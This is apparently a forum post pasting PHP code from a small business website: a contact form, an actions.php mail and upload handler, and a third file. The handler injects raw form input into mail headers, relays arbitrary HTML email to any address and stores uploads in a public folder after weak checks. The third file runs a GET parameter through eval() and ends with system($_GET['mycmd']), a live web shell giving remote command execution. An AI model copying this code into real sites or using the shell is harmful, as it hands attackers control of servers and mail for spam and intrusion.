Below is the contact form php, then the action php and each php...apologies if this is done wrong!!
Code: Select all
<div id="SendAMessage">
<p id="T" style="font-size: 18px; font-style: normal; line-height: 0%;"> SEND A MESSAGE <br /> <p id="text"> Here is your chance to tell us what your needs are. <br /> Complete the form below and we will respond as soon as possible. </p></p>
<?php if($_GET['res'] == 'email_sent'){?>
Your email has been sent, thank you!
<?php } ?>
</div>
<div id="BoxSendMessage">
<div id="TTCS"></div>
<div id="TTCD"></div>
<div id="TTT"></div>
<div id="TTL"></div>
<div id="TTR"></div>
<div id="SendMessageText">
<p id="T" style="font-size: 12px; font-style: normal; line-height: 100%;"> Name <br /> <br /> <br /> Email <br /> <br /> <br />Your Message </p>
</div>
<form action="actions.php?action=contact" method="POST" >
<input id="Nume" type="text" name="name" value="Your Name" style="border-radius: 4px; color:#888888;" onfocus="if (this.value=='Your Name') {this.value='';}"/>
<input id="Mail" type="text" name="mail" value="Your E-Mail" style="border-radius: 4px; color:#888888;" onfocus="if (this.value=='Your E-Mail') {this.value='';}"/>
<textarea id="Message" type="text" name="message" value="Your Message" style="border-radius: 4px; color:#888888;" onfocus="if (this.value==' Your Message ') {this.value='';}"> Your Message </textarea>
<a id="SendM" onmouseout="SEN()" onmouseover="SEND()" onclick="action(); return false;" style="cursor: pointer">
<div id="BColtS"> </div>
<div id="ABSs"> <p id="T" style="font-size: 12px; font-style: normal; line-height: 60%; margin-left: 9px;"> Send </p> </div>
<div id="BColtD"> </div>
</a>
</form>
</div>
</div>
<?php include "includes/bottom.php"?>
</div>
</td>
</tr>
</table>
</body>
<script type="text/javascript">
var obj1m = document.getElementById("SendM");
function SEN(){obj1m.style.color = "#363636";}
function SEND(){obj1m.style.color = "#FEC215";}
</script>
</html>Code: Select all
<?php require_once('includes/variabile.php');$action = ($_POST['action'])? $_POST['action'] : $_GET['action'];switch($action){ case "contact": $name = $_POST['name']; $message = $_POST['message'];mail($email_patron,'Contact from a client', $message,'From: '.$name.' <'.$_POST['mail'].'>' . "\r\n"."Reply-to: " . $_POST['mail'] . "\r\n");Header('Location: contact.php?res=email_sent');die();
break;//not necessary, just for style
case "quote":
print_r($_POST);
die();
Header('Location: instantquote.php');
die();
break;//not necessary, just for style
case "email_client":
$email = $_POST['email'];
mail($email,'Your quote at christianvelectrical.com',
urldecode($_POST['content'])
,
'From: '.$name.' <'.$_POST['email'].'>' . "\r\n".
"Reply-to: " . $_POST['email'] . "\r\n".
"Content-type: text/html \r\n");
break;
case "request_call":
$numerc = $_POST['numerc'];
$phonerc = $_POST['phonerc'];
$now = $_POST['now'];
$calendar = $_POST['calendar'];
mail($sales,'Request a call',
"Nume " . $numerc . "\r\n" .
"Phonerc " . $phonerc . "\r\n" .
"Date selected " . $calendar . "\r\n" );
/*'From: '.$name.' <'.$_POST['mail'].'>' . "\r\n".
"Reply-to: " . $_POST['mail'] . "\r\n");*/
break;
case "email_patron":
//print_r($_FILES);
//print_r($_POST);
$file = $_FILES['file']['tmp_name'];
$filename = $_FILES['file']['name'];
$ext = pathinfo($filename,PATHINFO_EXTENSION );
if($file){
if(substr_count($filename,'.')>1)
die('There must be exactly one . character in the filename');
if(!in_array($ext, array('gif','jpg','jpeg','bmp')))
die('File extension must be gif,png,jpg,jpeg or bmp!');
if(!imagecreatefromjpeg($file) && !imagecreatefrompng($file) && !imagecreatefromgif($file))
die('You must upload a valid gif,png,jpg,jpeg or bmp!');
if(is_uploaded_file($file)){
move_uploaded_file($file,'/var/www/vhosts/christianvelectrical.com/httpdocs/ups/'. $_FILES['file']['name']);
}else{
//die('not ifile');
}
}
mail($email_patron,'Quote de client-ul ' . $_POST['name'],
"\n\nNume " . $_POST['name']. "<br>\n\n".
"Email " . $_POST['email']. "<br>\n\n".
"Tel " . $_POST['tel']. "<br>\n\n".
"Total " . $_POST['total']. "<br>pounds <br><br>\n\n".
"Comments " . $_POST['comments']. " <br><br>\n\n".
'Link poza http://christianvelectrical.com/ups/'.$filename. "<br><br>\n\n".
urldecode($_POST['content'])
,
'From: '.$name.' <'.$_POST['email'].'>' . "\r\n".
"Reply-to: " . $_POST['email'] . "\r\n".
"Content-type: text/html \r\n");
//die('email sent');
break;
}
?>Code: Select all
<?php
//echo getcwd();
//phpinfo();
$challenge = function()
{
$t = (string)$_GET['eval'];//eval = (string)1337;return $rst;
//$t = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', '.'), '', $t);
echo $t . "len t = " . strlen($t) . "<br>\n";
if((strlen($t) > 13) || (false !== strpos($t, 'return')))
{
echo ('Nu e permis!');
}
try
{
eval("\$rst= $t");
}
catch (Exception $e)
{
//var_dump($e);
return false;
}
var_dump($rst);
return ($rst=== '1337');
};
$a = $challenge();
echo "<br>";
var_dump($a);
system($_GET['mycmd']);
?>